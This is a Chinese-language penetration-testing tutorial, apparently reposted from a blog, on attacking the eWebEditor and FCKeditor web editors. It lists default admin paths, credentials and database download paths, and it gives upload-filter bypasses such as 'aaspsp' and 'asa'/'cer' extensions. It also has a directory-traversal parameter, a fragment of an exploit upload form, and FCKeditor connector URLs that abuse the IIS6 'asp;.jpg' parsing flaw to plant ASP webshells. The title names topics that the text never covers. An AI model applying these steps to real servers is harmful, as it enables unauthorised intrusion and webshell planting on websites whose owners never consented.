html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过
常用的編輯器
常見的編輯器有Ewebeditor? fckeditor? CKeditor kindeditor
1.Ewebeditor
測試環境用的是eWebEditor_v216_Free版本? 可以自己去網上下載對應的版本搭建本地環境
利用核心
默認后臺:www.xxxx.com/ewebeditor/admin_login.asp
默認數據庫:ewebeditor/db/ewebeditor.mdb
默認賬號密碼:admin admin/admin888
利用過程
常用入侵Ewebeditor 編輯器的步驟如下
1.首先訪問默認管理頁面看是否存在
默認管理頁地址2.80以前為?ewebeditor/admin_login.asp?以后版本為admin/login.asp(其他語言改后戳,這里以asp為例) 。
2.默認管理員賬戶密碼
如果默認管理頁面存在? 就用默認賬戶密碼登錄? 默認賬戶密碼為? admin? ?admin888??常用的密碼還有admin admin999 admin1 admin000?之類的。? 可以爆破一下
3.默認數據庫地址
如果密碼不是默認的? 就去嘗試下載默認的數據庫
默認數據庫路徑為:ewebeditor/db/ewebeditor.mdb?常用數據庫路徑為:ewebeditor/db/ewebeditor.asa
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.asa
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/ewebeditor.mdb
ewebeditor/db/!@#ewebeditor.asp
ewebeditor/db/ewebeditor1033.mdb?等等。
很多管理員經常把數據庫的后綴改成 asp asa? 可以直接用迅雷下載下來
如果默認賬戶密碼正確 登錄到后臺以后
在圖片類型這里加入asa|cer|asp|aaspsp這些后綴名
如果asp被過濾掉? 可以用aaspsp后綴來繞過?如果遇到一個管理員有安全意識的,從代碼里,把.asp .asa .cer .cdx 都完全禁止了,我們也可以用.asasaa 后綴來突破。
asa cer后綴在IIS6.0平臺解析為asp執行
Aaspsp:繞過過濾過濾asp aaspsp=》asp
找到剛剛添加的樣式 點擊工具欄 開始添加按鈕
先新增一個工具欄? 再點按鈕設置
找到插入或修改圖片 點右箭頭 添加到已選按鈕框內? 點擊保存設置? ?換一個低版本的IE瀏覽器? ?訪問編輯器就可以上傳圖片了? ?低版本的編輯器是不支持高版本的瀏覽器的
再返回樣式管理? ?找到剛才設置的那個樣式? 點擊預覽? 這里就要使用低版本的IE 否則是加載不出來按鈕的
高版本瀏覽器
上圖就是高版本瀏覽器訪問低版本編輯器 就是這樣? 啥也點不了
低版本IE
上圖就是低版本的IE? 可以插入內容 點擊上傳圖片按鈕等等
多版本IE集成瀏覽器??IETester
這邊已經設置好可以上傳cerasp等后綴文件
直接上傳一個asp的馬就可以
上傳好之后點代碼? 這塊千萬不要點查看源文件 查看源文件啥也查看不到
直接訪問上傳的webshell地址
2.目錄遍歷
第一步點上傳文件管理? ?隨便選擇一個樣式目錄
在id=xx后面加上&dir=../
直接可以遍歷目錄? 下載文件
由于目錄遍歷漏洞存在2.8.0? 我這個版本較低? 沒有? 就不演示了
3.尋找前人入侵痕跡
如何判斷有前人入侵過了??下載好數據庫之后查看他的eWebEditor_style表中的S_ImageExt字段是否有被人添加過什么。
使用下面的語句進入突破:
ewebeditor.asp?ID=xx&style=yy
其中的id=xx就是被修改過的那條記錄的id,而yy就是S_name字段的名字。
例如這里就修改成: ewebeditor.asp?ID=54&style=testckse 去訪問圖片控件就出來了。。
4.文件上傳漏洞
ewebeditor asp版 2.1.6 上傳漏洞利用程序----
name=myform enctype="multipart/form-data">
type=file name=uploadfile size=100>
type=submit value=Fuck>
保存上面代碼到HTML? 直接上傳cer格式木馬
正常是這個頁面? ?但是沒有上傳按鈕? ?自己寫一個上傳按鈕
上傳成功之后會跳到上面黑黑的頁面
右鍵查看源代碼在最下面會看到上傳上去的文件名稱
完結....................
FCKeditor編輯器漏洞利用
先訪問這個頁面查看編輯器版本/_whatsnew.html
常用上傳地址FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
由于這里用的是2.5的版本所以下面這條語句能用http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
先試試解析漏洞 上傳一個a.asp;.png試一下
前面的.被過濾掉了
再試試二次上傳
第一次上傳:qq.asp;.jpg ==》qq_asp;.jpg
第二次上傳:qq.asp;.jpg ==》qq_asp;.jpg (不滿足命名要求)
可能出現第二次命名為qq.asp;.(1).jpg
還是不行
創建文件夾也沒用
執行以下地址就能成功創建文件夾/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=xx.asp
這又是為什么了????手動不能創建,而通過以上地址就能成功創建了,讓我們來對比下,手動創建和通過以上地址創建的一個區別。
漏洞地址:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp
手工新建:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp
原因:
CurrentFolder:當前文件夾?未進行過濾(這個文件夾下的沒有過濾)
NewFolderName:新建文件名?進行了過濾
這就是為什么通過上面地址能創建,而手動卻不能創建的一個原因,然后我們再上傳6.asp;.jpg到fendo.asp文件下看是否成功解析。
隨便上傳個一句話
然后對照服務器那邊拼接上傳路徑
總結
以上是生活随笔為你收集整理的html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何知道股票里面有庄
- 下一篇: 2021年度训练联盟热身训练赛第八场 自